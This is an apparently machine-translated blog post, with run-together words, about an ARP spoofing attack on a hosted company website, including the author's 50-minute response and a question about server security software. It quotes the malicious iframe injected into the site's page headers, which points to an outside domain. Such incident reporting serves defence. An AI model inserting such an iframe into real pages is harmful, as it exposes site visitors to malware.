1.Attack Phenomenon
5Month16Day19:00Left and Right, get a message on the way home from work, the company's website access is abnormal, the exception is as follows
A)IE7Open all websitesHtmlThe page becomes a file download, and the website cannot be opened normally
B)IE7Do not useHttp1.1You can open the website, but the source file header is embedded1ItemsIFRAME
IFRAMEContent:<IFRAME src = http://xindizhi88.com/10.htm width = 20 Height = 0 frameborder = 0> </iframe>
GoogleBaidu finds that the server has receivedARPAttack
Http://www.google.cn/search? Sourceid = navclient & HL = ZH-CN & Ie = UTF-8 & rlz = 1t4gglj_zh-cn248cn249 & Q = % 22xindizhi88% 2 ECOM % 22
Http://www.baidu.com? WD = % 22xindizhi88% 2 ECOM % 22 & CL = 3
2.Attack Solution
A)InstallationARPFirewall software
I used it here.360Security guard and360arpFirewall. The effect is good, and the access is normal. At this time19:50.Whole spent50Minutes. We also foundARPAttack source.
B)FindARPAttack Source killing
Because it is a server hosting service, I will send the information I found here to the technical staff of the hosting equipment room.21:00Receive IDC notificationsARPThe attack source has been processed. The server is actually normal.
3.References
A)One rowCodeTemporary solutionIFRAMETrojan:Http://www.foloda.com.cn/BLOG/article.asp? Id = 70
4.QuiltARPReflection after attack
A)What kind of security software should I install on a general server?
I.Anti-Virus Software
II.DefenseDDoSAttack Software
III.DefenseARPAttack Software
IV.And...
You may give more comments.